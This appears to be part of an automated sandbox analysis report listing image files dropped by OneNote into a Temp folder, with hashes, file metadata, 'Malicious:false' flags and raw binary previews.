                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0C1EB65A-C00B-4F36-93FB-8775811426C2}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65998
                                                                                                                                            Entropy (8bit):7.671031449942883
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                            MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                            SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                            SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                            SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0C2FA063-1F98-4C2F-AC55-11EEB7156EEF}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13030
                                                                                                                                            Entropy (8bit):7.948664903731204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                            MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                            SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                            SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                            SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0D47012C-43F5-48CD-B034-867F47D73F2A}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3879
                                                                                                                                            Entropy (8bit):7.9281351307465044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                            MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                            SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                            SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                            SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{0E911375-2027-4BFD-AD09-40CF5ECD6FBA}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{11332358-69D4-4C99-B4D4-9462197D93F2}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1149483F-E649-4D7A-A1FB-9738BCBD8AF2}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14458
                                                                                                                                            Entropy (8bit):7.944094738048628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                            MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                            SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                            SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                            SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{13F97A68-731E-4C8D-BB3A-4B586A1CAEC7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{14E516C9-D3E9-48E5-92F7-1089A63383E0}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59832
                                                                                                                                            Entropy (8bit):7.308211468398169
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                            MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                            SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                            SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                            SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1527F0CD-5D5B-4BFF-8C27-241F41FAB550}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1560A7B7-0C6D-485F-8BA7-59102B365CDA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{15AAFE4F-54A6-4A42-93E6-B65340377FE3}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{15BE4484-40C8-4331-95FA-4C7CA8DC95FA}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{1643D59C-B65A-4599-9EE6-FBE1B821669D}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
